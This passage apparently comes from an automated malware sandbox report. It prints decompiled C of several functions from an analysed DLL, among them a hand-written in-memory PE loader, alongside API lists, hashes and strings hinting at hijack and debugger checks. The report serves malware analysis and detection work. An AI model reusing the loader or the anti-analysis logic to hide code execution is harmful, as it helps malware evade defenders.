                                                                                                                                                0x10020616
                                                                                                                                                0x1002061b
                                                                                                                                                0x1002061e
                                                                                                                                                0x10020620
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10020627
                                                                                                                                                0x10020639
                                                                                                                                                0x1002063e
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10020640
                                                                                                                                                0x00000000
                                                                                                                                                0x1002063e
                                                                                                                                                0x10020644
                                                                                                                                                0x10020662
                                                                                                                                                0x1002066a
                                                                                                                                                0x1002066d
                                                                                                                                                0x1002066f
                                                                                                                                                0x1002067f
                                                                                                                                                0x10020685
                                                                                                                                                0x1002068a
                                                                                                                                                0x10020698
                                                                                                                                                0x1002069a
                                                                                                                                                0x100206d0
                                                                                                                                                0x100206d0
                                                                                                                                                0x100206d5
                                                                                                                                                0x100206e5
                                                                                                                                                0x100206eb
                                                                                                                                                0x100206f3
                                                                                                                                                0x100206f8
                                                                                                                                                0x10020708
                                                                                                                                                0x1002070e
                                                                                                                                                0x10020716
                                                                                                                                                0x1002071b
                                                                                                                                                0x1002072b
                                                                                                                                                0x10020731
                                                                                                                                                0x1002073e
                                                                                                                                                0x1002074e
                                                                                                                                                0x10020754
                                                                                                                                                0x1002069c
                                                                                                                                                0x1002069c
                                                                                                                                                0x100206a1
                                                                                                                                                0x100206a6
                                                                                                                                                0x100206a8
                                                                                                                                                0x100206b3
                                                                                                                                                0x100206aa
                                                                                                                                                0x100206af
                                                                                                                                                0x100206b1
                                                                                                                                                0x100206bf
                                                                                                                                                0x100206c4
                                                                                                                                                0x100206c7
                                                                                                                                                0x100206c9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100206cb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100206b1
                                                                                                                                                0x100206a8
                                                                                                                                                0x00000000
                                                                                                                                                0x1002058b
                                                                                                                                                0x1002075c
                                                                                                                                                0x10020761
                                                                                                                                                0x1002076b
                                                                                                                                                0x10020775
                                                                                                                                                0x1002077a
                                                                                                                                                0x10020544
                                                                                                                                                0x10020549
                                                                                                                                                0x10020551
                                                                                                                                                0x1002055b
                                                                                                                                                0x10020565
                                                                                                                                                0x1002056a
                                                                                                                                                0x1002056a
                                                                                                                                                0x10020783
                                                                                                                                                0x1002078e

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 100204F9
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                • String ID: -0.3$46.0.0$46.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$installp3$installp3$installp3$status=check_debug$status=main_over$status=main_start
                                                                                                                                                • API String ID: 3079340674-908818648
                                                                                                                                                • Opcode ID: 5b46908abf91a186510f920af5aff9a3b619072a939ffc6013e13a21394ecda3
                                                                                                                                                • Instruction ID: c22925573318c8528c32417883aa4fd6f710712ddf5f47052043116b831c363f
                                                                                                                                                • Opcode Fuzzy Hash: 5b46908abf91a186510f920af5aff9a3b619072a939ffc6013e13a21394ecda3
                                                                                                                                                • Instruction Fuzzy Hash: 0951B2B5D04318ABEB20EBA4DC4BBDE7775DB10344F400194F90966182EB31BB84CFA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019780, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF20(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
					_v8 = 1;
				}
				return _v8;
			}






                                                                                                                                                0x10019786
                                                                                                                                                0x1001978d
                                                                                                                                                0x100197ac
                                                                                                                                                0x100197bb
                                                                                                                                                0x100197ce
                                                                                                                                                0x100197de
                                                                                                                                                0x10019804
                                                                                                                                                0x1001980a
                                                                                                                                                0x1001980a
                                                                                                                                                0x10019817

                                                                                                                                                APIs
                                                                                                                                                • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                • _memset.LIBCMT ref: 100197DE
                                                                                                                                                • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 895502402-0
                                                                                                                                                • Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                • Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
                                                                                                                                                • Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                • Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A170, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A170(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}







                                                                                                                                                0x1001a179
                                                                                                                                                0x1001a18e
                                                                                                                                                0x1001a194
                                                                                                                                                0x1001a1a1
                                                                                                                                                0x1001a1a9
                                                                                                                                                0x1001a1a9
                                                                                                                                                0x1001a1b6
                                                                                                                                                0x1001a1c5

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001B620, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 350libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AE40(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AE80(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B0C0(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001AB60(_v76); // executed
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B490(_v76); // executed
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001AD80(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A960(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}












































                                                                                                                                                0x1001b620
                                                                                                                                                0x1001b620
                                                                                                                                                0x1001b620
                                                                                                                                                0x1001b626
                                                                                                                                                0x1001b62d
                                                                                                                                                0x1001b64b
                                                                                                                                                0x1001b654
                                                                                                                                                0x1001b659
                                                                                                                                                0x1001b65e
                                                                                                                                                0x1001b66a
                                                                                                                                                0x1001b678
                                                                                                                                                0x1001b68f
                                                                                                                                                0x1001b69d
                                                                                                                                                0x1001b6a2
                                                                                                                                                0x1001b6a7
                                                                                                                                                0x1001b6b6
                                                                                                                                                0x1001b6b9
                                                                                                                                                0x1001b6c5
                                                                                                                                                0x1001b6e6
                                                                                                                                                0x1001b703
                                                                                                                                                0x1001b725
                                                                                                                                                0x1001b72e
                                                                                                                                                0x1001b731
                                                                                                                                                0x1001b74c
                                                                                                                                                0x1001b75f
                                                                                                                                                0x1001b77b
                                                                                                                                                0x1001b761
                                                                                                                                                0x1001b76a
                                                                                                                                                0x1001b76a
                                                                                                                                                0x1001b784
                                                                                                                                                0x1001b789
                                                                                                                                                0x1001b789
                                                                                                                                                0x1001b740
                                                                                                                                                0x1001b749
                                                                                                                                                0x1001b749
                                                                                                                                                0x1001b792
                                                                                                                                                0x1001b7a8
                                                                                                                                                0x1001b7b3
                                                                                                                                                0x1001b7b8
                                                                                                                                                0x1001b7be
                                                                                                                                                0x1001b7e8
                                                                                                                                                0x1001b7eb
                                                                                                                                                0x1001b7ee
                                                                                                                                                0x1001b7f5
                                                                                                                                                0x1001b826
                                                                                                                                                0x1001b837
                                                                                                                                                0x1001b83e
                                                                                                                                                0x1001b86a
                                                                                                                                                0x1001b87c
                                                                                                                                                0x1001b883
                                                                                                                                                0x1001b88c
                                                                                                                                                0x1001b895
                                                                                                                                                0x1001b89e
                                                                                                                                                0x1001b8a7
                                                                                                                                                0x1001b8b0
                                                                                                                                                0x1001b8b9
                                                                                                                                                0x1001b8c2
                                                                                                                                                0x1001b8d0
                                                                                                                                                0x1001b8d5
                                                                                                                                                0x1001b8da
                                                                                                                                                0x1001b8fd
                                                                                                                                                0x1001b90f
                                                                                                                                                0x1001b91d
                                                                                                                                                0x1001b923
                                                                                                                                                0x1001b92d
                                                                                                                                                0x1001b940
                                                                                                                                                0x1001b945
                                                                                                                                                0x1001b94a
                                                                                                                                                0x1001b95c
                                                                                                                                                0x1001b95f
                                                                                                                                                0x1001b962
                                                                                                                                                0x1001b97f
                                                                                                                                                0x1001b964
                                                                                                                                                0x1001b96c
                                                                                                                                                0x1001b971
                                                                                                                                                0x1001b977
                                                                                                                                                0x1001b977
                                                                                                                                                0x1001b98a
                                                                                                                                                0x1001b98f
                                                                                                                                                0x1001b994
                                                                                                                                                0x1001b99f
                                                                                                                                                0x1001b9a4
                                                                                                                                                0x1001b9a9
                                                                                                                                                0x1001b9b4
                                                                                                                                                0x1001b9b9
                                                                                                                                                0x1001b9be
                                                                                                                                                0x1001b9cb
                                                                                                                                                0x1001ba27
                                                                                                                                                0x1001ba2e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba2e
                                                                                                                                                0x1001b9d4
                                                                                                                                                0x1001ba1f
                                                                                                                                                0x1001ba22
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba22
                                                                                                                                                0x1001b9e1
                                                                                                                                                0x1001b9ef
                                                                                                                                                0x1001b9f6
                                                                                                                                                0x1001ba08
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba08
                                                                                                                                                0x1001b9fd
                                                                                                                                                0x1001ba33
                                                                                                                                                0x1001ba37
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ba3f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b9c0
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b9ab
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b996
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b94c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b8dc
                                                                                                                                                0x1001b84f
                                                                                                                                                0x1001b857
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b85d
                                                                                                                                                0x1001b808
                                                                                                                                                0x1001b80b
                                                                                                                                                0x1001b80e
                                                                                                                                                0x1001b815
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b819
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b81f
                                                                                                                                                0x1001b7c5
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b7cb
                                                                                                                                                0x1001b70a
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b710
                                                                                                                                                0x1001b6ed
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b6f3
                                                                                                                                                0x1001b6cc
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b6d2
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b6a9
                                                                                                                                                0x1001b67f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b685
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 1001B645
                                                                                                                                                  • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
                                                                                                                                                • SetLastError.KERNEL32(000000C1), ref: 1001B67F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                • API String ID: 1762409328-192647395
                                                                                                                                                • Opcode ID: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                • Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
                                                                                                                                                • Opcode Fuzzy Hash: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                • Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000E90E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                			E1000E90E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033347c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10333484 = (_t20 << 8) + _t39;
						 *0x10333488 = _t20;
						 *0x1033348c = _t39;
						 *0x10333480 = _t47;
						_t21 = E1000F7BF(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E100133E0(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E10015081();
								 *0x10336f64 = GetCommandLineA();
								 *0x103332fc = E10014F4C(); // executed
								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014E93(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014BD4();
										goto L10;
									} else {
										_t32 = E10014C20(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103332f8 =  *0x103332f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E100130CA();
									goto L8;
								}
							} else {
								L8:
								E1000F819();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                0x1000e90e
                                                                                                                                                0x1000e925
                                                                                                                                                0x1000e929
                                                                                                                                                0x1000e933
                                                                                                                                                0x1000e935
                                                                                                                                                0x1000e93b
                                                                                                                                                0x1000e93d
                                                                                                                                                0x1000e93e
                                                                                                                                                0x1000e940
                                                                                                                                                0x1000e953
                                                                                                                                                0x1000e959
                                                                                                                                                0x1000e95f
                                                                                                                                                0x1000e962
                                                                                                                                                0x1000e96b
                                                                                                                                                0x1000e971
                                                                                                                                                0x1000e974
                                                                                                                                                0x1000e977
                                                                                                                                                0x1000e979
                                                                                                                                                0x1000e979
                                                                                                                                                0x1000e979
                                                                                                                                                0x1000e97f
                                                                                                                                                0x1000e982
                                                                                                                                                0x1000e987
                                                                                                                                                0x1000e98f
                                                                                                                                                0x1000e993
                                                                                                                                                0x1000e999
                                                                                                                                                0x1000e99e
                                                                                                                                                0x1000e9a4
                                                                                                                                                0x1000e9aa
                                                                                                                                                0x1000e9af
                                                                                                                                                0x1000e9b1
                                                                                                                                                0x1000e9b2
                                                                                                                                                0x00000000
                                                                                                                                                0x1000e9b8
                                                                                                                                                0x1000e9b8
                                                                                                                                                0x1000e9bd
                                                                                                                                                0x1000e9bf
                                                                                                                                                0x1000e9cb
                                                                                                                                                0x1000e9d6
                                                                                                                                                0x1000e9e0
                                                                                                                                                0x1000e9e5
                                                                                                                                                0x1000e9ea
                                                                                                                                                0x1000e9ec
                                                                                                                                                0x1000e9f5
                                                                                                                                                0x1000e9fa
                                                                                                                                                0x1000e9fc
                                                                                                                                                0x1000ea1e
                                                                                                                                                0x1000ea1e
                                                                                                                                                0x00000000
                                                                                                                                                0x1000e9fe
                                                                                                                                                0x1000e9fe
                                                                                                                                                0x1000ea03
                                                                                                                                                0x1000ea05
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ea07
                                                                                                                                                0x1000ea09
                                                                                                                                                0x1000ea0e
                                                                                                                                                0x1000ea11
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ea13
                                                                                                                                                0x1000ea13
                                                                                                                                                0x1000eacc
                                                                                                                                                0x1000eacc
                                                                                                                                                0x1000eacc
                                                                                                                                                0x1000ea11
                                                                                                                                                0x1000ea05
                                                                                                                                                0x1000e9ee
                                                                                                                                                0x1000e9ee
                                                                                                                                                0x1000e9ee
                                                                                                                                                0x00000000
                                                                                                                                                0x1000e9ee
                                                                                                                                                0x1000e9c1
                                                                                                                                                0x1000e9c1
                                                                                                                                                0x1000e9c1
                                                                                                                                                0x00000000
                                                                                                                                                0x1000e9c1
                                                                                                                                                0x1000e9bf
                                                                                                                                                0x1000e942
                                                                                                                                                0x1000e945
                                                                                                                                                0x00000000
                                                                                                                                                0x1000e945
                                                                                                                                                0x1000e92b
                                                                                                                                                0x1000e92b
                                                                                                                                                0x1000e92b
                                                                                                                                                0x1000e92b
                                                                                                                                                0x1000ead1

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2870529951-0
                                                                                                                                                • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
